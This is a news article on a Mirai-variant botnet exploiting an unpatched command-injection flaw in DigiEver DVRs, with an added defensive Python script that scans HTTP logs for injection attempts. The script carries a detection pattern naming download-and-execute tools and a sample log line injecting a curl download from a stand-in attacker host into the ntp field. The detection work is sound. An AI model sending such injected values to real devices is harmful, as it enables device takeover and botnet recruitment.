New Mirai Botnet Exploits Zero-Day Vulnerability in DigiEver DVRs
Cybersecurity researchers have uncovered a new botnet, based on the Mirai framework, which actively exploits a zero-day remote code execution vulnerability in DigiEver DS-2105 Pro DVR devices. As this vulnerability remains unpatched and has not yet been assigned a CVE identifier, it leaves the affected devices as easy targets for attackers.
The cyberattack began in October, targeting various network video recorders and TP-Link routers running outdated firmware. One of the vulnerabilities exploited during the campaign was presented by TXOne researcher Ta-Lun Yen at the DefCamp conference in Bucharest. According to his findings, the flaw impacts numerous DVR devices.
Akamai specialists detected active exploitation of this vulnerability starting in mid-November, though evidence suggests that the attacks likely commenced as early as September. Alongside DigiEver devices, the botnet also leverages vulnerabilities such as CVE-2023-1389 in TP-Link devices and CVE-2018-17532 in Teltonika RUT9XX routers.
The DigiEver vulnerability is a flaw in how the device processes requests to the URI /cgi-bin/cgi_main.cgi, where user input is insufficiently validated. This oversight allows unauthenticated attackers to inject commands remotely, such as curl and chmod, through HTTP request parameters like the ntp field.
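As an added example, not code from the article or from the Akamai report, the following Python script shows the kind of check a defender monitoring the DVR's HTTP front end would run: it scans access-log lines for requests to /cgi-bin/cgi_main.cgi whose ntp parameter contains shell metacharacters, names download-and-execute tooling, or is simply not a plausible hostname or IP literal. It assumes the logs are in Apache common log format (the appliance's real format may differ), the access-log lines and the attacker.invalid hostname are constructed for the example, and the list of flagged tool names (curl and chmod from the article, plus wget and tftp) is my own.

```python
"""
Detect command-injection attempts against a DVR CGI endpoint in HTTP access logs.

Added example for this page. The endpoint path and the "ntp" parameter come from
the article; the log lines, hostnames and extra tool names are constructed/assumed.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

TARGET_PATH = "/cgi-bin/cgi_main.cgi"   # endpoint named in the article
WATCHED_PARAMS = {"ntp"}                # parameter named in the article

# Characters that never belong in an NTP server field but matter to a shell.
SHELL_META = re.compile(r"[;&|`$(){}<>\\'\"\n\r]")
# Download-and-execute tooling; curl/chmod are from the article, wget/tftp are assumed.
SUSPICIOUS_WORDS = re.compile(r"\b(curl|wget|chmod|tftp)\b", re.IGNORECASE)
# A legitimate value is a hostname or dotted IPv4 literal and nothing else.
VALID_NTP = re.compile(r"^[A-Za-z0-9.-]{1,253}$")

# Apache common log format: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Constructed sample log; the third line is a made-up injection attempt.
SAMPLE_LOG = """\
203.0.113.7 - - [14/Nov/2024:02:11:09 +0000] "GET /index.html HTTP/1.1" 200 2048
192.0.2.10 - - [14/Nov/2024:02:11:15 +0000] "GET /cgi-bin/cgi_main.cgi?ntp=pool.ntp.org HTTP/1.1" 200 88
198.51.100.23 - - [14/Nov/2024:02:12:40 +0000] "GET /cgi-bin/cgi_main.cgi?ntp=0.pool.ntp.org%3Bcurl+http%3A%2F%2Fattacker.invalid%2Fstage HTTP/1.1" 200 88
198.51.100.23 - - [14/Nov/2024:02:12:41 +0000] "GET /cgi-bin/cgi_main.cgi?ntp=192.0.2.1 HTTP/1.1" 200 88
"""


def inspect_request(target):
    """Return the list of reasons a request target looks like an injection attempt.

    An empty list means the request is not for the watched endpoint or is clean.
    """
    parts = urlsplit(target)
    if parts.path != TARGET_PATH:
        return []
    params = parse_qs(parts.query, keep_blank_values=True)
    reasons = []
    for name in sorted(WATCHED_PARAMS):
        for raw in params.get(name, []):
            # parse_qs already decoded once; decode again to defeat double encoding.
            value = unquote(raw)
            if SHELL_META.search(value):
                reasons.append(f"{name}: shell metacharacter")
            if SUSPICIOUS_WORDS.search(value):
                reasons.append(f"{name}: download/exec tooling")
            if not VALID_NTP.match(value):
                reasons.append(f"{name}: not a hostname or IPv4 literal")
    return reasons


def scan_log(lines):
    """Return [(client_ip, target, reasons)] for every request flagged by inspect_request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        reasons = inspect_request(m["target"])
        if reasons:
            hits.append((m["ip"], m["target"], reasons))
    return hits


if __name__ == "__main__":
    for ip, target, reasons in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{ip} {target}\n    " + "\n    ".join(reasons))
```

The allow-list check (VALID_NTP) is the one that matters: the metacharacter and tool-name patterns only label why a value was rejected, so an attacker varying the payload still trips the hostname test. Run against a real appliance's logs, the LOG_RE pattern is the part most likely to need adjusting.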
Hackers exploit command injection to download malicious payloads from external servers, after which the compromised devices join the botnet. To maintain persistent access, cron jobs are added to the devices. These compromised systems are subsequently used to conduct DDoS attacks or further propagate the botnet.
The new variant of Mirai stands out due to its use of XOR and ChaCha20 encryption, as well as support for multiple architectures, including x86, ARM, and MIPS. Akamai analysts believe this indicates a growing sophistication in the tactics employed by botnet operators.
While many botnets still rely on the original encryption algorithms from Mirai’s initial source code, advanced techniques like ChaCha20 highlight the escalating threat level. The Akamai report provides indicators of compromise (IoCs) and Yara rules to aid in detecting and mitigating this evolving threat.
Modern botnets exemplify increasing complexity and adaptability, turning each vulnerability into a powerful weapon for large-scale attacks. Building a robust digital defense requires not only timely updates but also proactive threat analysis to stay ahead of adversaries.